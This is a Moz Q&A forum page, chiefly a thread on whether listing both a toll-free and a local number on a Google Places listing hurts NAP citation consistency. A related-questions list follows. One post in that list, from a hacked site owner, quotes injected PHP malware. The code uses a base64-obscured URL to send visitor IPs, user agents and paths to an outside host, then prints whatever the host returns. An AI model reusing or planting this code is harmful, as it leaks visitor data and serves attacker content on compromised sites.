Will two numbers on a local listing affect me?
-
The reason I'm asking this question is. I was on the phone with a Google Rep yesterday for one of my google places. It was in reference to map maker and the fact that I only wanted one number on the listing. About a month ago I had it, so I deleted the listing's local number and than had an 877 number. The problem is when I checked on Friday the Local number was then added back by a Google moderator in Map Maker. So, now there's two numbers on the listing. He told me that would not affect my NAP info, which I don't believe.
He also went on to say that Google goes through listings and if they have an 800 number they may delete it and replace place it with a local number.Has anyone delt with this and can Verify what he says to be true? Additionally, will my NAP be affected if this is the case? Thanks.
-
Great! So glad to be of help.
-
Yes Miriam, this is crystal clear. I really appreciate your help.
-
Hi Peter,
You should not be using a toll free number as part of your NAP. Your Local number is the 'P' in NAP. Anything else is a supplementary number. Different Local SEOs may have a different approach than mine, but when I am doing local SEO, I do not include toll free numbers in crawl-able text on the website - I put them in image text in the masthead, if required. I put the complete NAP (name-address-phone) in the footer and on the contact page, encoded in Schema markup. I list the local phone number on all local citations. If it is necessary to list a supplementary number like a toll free number, I do that in the additional phone number field offered by some of the indexes/directories. Google understands which number is local if you've put in in the primary number field and it matches what they find on your website and elsewhere. But, should you decide to put toll free numbers as though they were the primary number in some of your citations, then, yes, there is a concern that Google will not trust their data about the business.
Does this make sense, Peter? I want to be sure I'm explaining this well to you.
-
So then the question is, If I do have two numbers on each NAP for local listing citations and Directories. How does Google know which is the preferred number and which number will come up when someone searches for my website?
-
Hi Peter,
Yes, it would affect your citation consistency. You should always list your primary local number first on all local listings, and be sure it is in crawl-able text on the website. I do not recommend creating any local listing with only your toll free number.
-
Okay, so my question is, if I list my Google Listing with a toll free and local phone. Then, I list other listings(Yellow pages, Yelp, Insider pages etc) with just purely a toll free number. Would that affect the rest of my citations? Thanks for your help Miriam.
-
Hi Peter,
All local listings hang on NAP (name, address and phone number) and the phone number aspect must be a local area code phone number. You should not be listing a toll free number as your main number - not on your local business listings, website or anyplace else. I have not personally run across a report before of Google manually changing a toll free number to a local one, but number changes can definitely take place because Google is scraping data from a variety of sources. If they find instances of the web of your NAP with the local phone number, then they would certainly prefer to use that, as toll free numbers aren't viewed as local.
The Google Places dashboard provides you with an option to list an alternate, secondary number, so if you want to put your toll free number there, that's acceptable, but don't list it as your core number. That's not what Google wants.
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
Does type of hosting affect SEO rankings?
Hello, I was wondering if hosting on shared, versus VPS, versus dedicated ... matter at all in terms of the rankings of Web sites ... given that all other factors would be exactly equal. I know this is a big question with many variables, but mainly I am wondering if, for example, it is more the risk of resource usage which may take a site down if too much traffic and therefore make it un-crawlable if it happens at the moment that a bot is trying to index the site (factoring out the UX of a downed site). Any and all comments are greatly appreciated! Best regards,
White Hat / Black Hat SEO | | uworlds
Mark0 -
1 business targetting multiple local locations
When researching a new client - I just came across a site in the same field which is ranking really well for all the local towns/cities/villages in the area. Each page for each town is a duplicate only changing out the town name (which appears 13 times on the page) - all pics and videos are the same. His url structure is along the lines of: budget-business-domain.com/budget-business-area/budget-business-town/ The domain was registered in 2012 - all backlinks are internal - anchor text is the same. I think it shouldn't be working.... but it is 😞 Why is this working?
White Hat / Black Hat SEO | | agua0 -
Competitor owns two domains which are essentially duplicates. Is this allowed?
Hello everyone,One of my competitors has two E-commerce sites that are almost exactly the same. The company re-branded a few years ago (changed the company name, changed the domain name) but kept the first domain live which is still fairly successful. Their re-branded website is a Top 1000 retailer.The thing is, both websites are essentially the EXACT SAME. They have the same products (with the same item #'s), the same pricing, the same copy and product descriptions, the same contact info, same layout, etc. The internal search bar on the first domain even redirects to their current site! The only real difference are the brand names. Currently, both sites are ranking very well for some very competitive keywords. For the past two years, I kept waiting for Google to penalize one (or both) of them for duplication. But for some reason Google seems to have not noticed. **Is there any way to "show google" site duplication they might be missing?**Thanks!
White Hat / Black Hat SEO | | bpharris90141 -
Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
Local area coverage
Hi Moz people... I have a little one that i can't quite get my head into the best way of achieving the clients goals. My client has a local business but also travels. His area coverage is around 50 miles from his base. He also has a few skills, all under the main discipline. When users search for his skills set, they would search for a specific skill against where they live ie. "skill1 in city A" What is the best way concentrate on these locations, and make sure his is targeting them? I know int he old days dynamic pages where created for each location (now black hat?), but I don't think this is now the best way forward? Any help, tips or just 'look at this' would really help me out.
White Hat / Black Hat SEO | | Jimboroberts0 -
Why does Google recommend schema for local business/ organizations?
Why does Google recommend schema for local business/ organizations? The reason I ask is I was in Structed Data Testing Tool, and I was running some businesses and organizations through it. Yet every time, it says this "information will not appear as a rich snippet in search results, because it seems to describe an organization. Google does not currently display organization information in rich snippets". Additionally, many of times when you do search the restaurant or a related query it will still show telephone number and reviews and location. Would it be better to list it as a place, since I want to have its reviews and location show up thanks? I would be interested to hear what everyone else opinions are on this thanks.
White Hat / Black Hat SEO | | PeterRota0 -
Ditching of spammy links - will it be of benefit?
Hi there. We have recently taken over the SEO for a five-star hotel who rank very well already for a lot of their main terms, largely down to the fact they have decent off-site strength (as yet very little on-page optimisation has been done, so they aren't appearing for some quite key terms). This off-page strength includes around 2000 links, giving the home page an authority of 63 in the OSE tool. However, upon looking at the links to check they were pointing to the most relevant page etc, I notice they have A LOT of spammy links, pointing to their site with anchor text like 'cheap cialis' or 'buy valium'. Clearly these aren't the kinds of links that should be pointing to a five-star hotel, but should I expect to see much of a drop by attempting to remove these links? We obviously want to clean their link portfolio up, but I'm not sure they would be too happy if all their top rankings disappeared - even if only temporarily, and even if done with the best intentions. I ask as none of the other sites we handle SEO for have had such a proliferation of these links, so I've not seen the ramifications in full. Any help would be much appreciated, along with advice on the best way to remove these links.
White Hat / Black Hat SEO | | themegroup0 -
Partners and Customers logo listing and links
We have just created a program where we list the customers that use our software and a link to their websites on a new "Customers" page. We expect to have upwards of 100 logos with links back to their sites. I want to be sure this isn't bordering on gray or black hat link building. I think it is okay since they are actual users of our software. But there is still that slight doubt. Along these same lines, would you recommend adding a nofollow or noindex tag? Thanks for your help.
White Hat / Black Hat SEO | | PerriCline0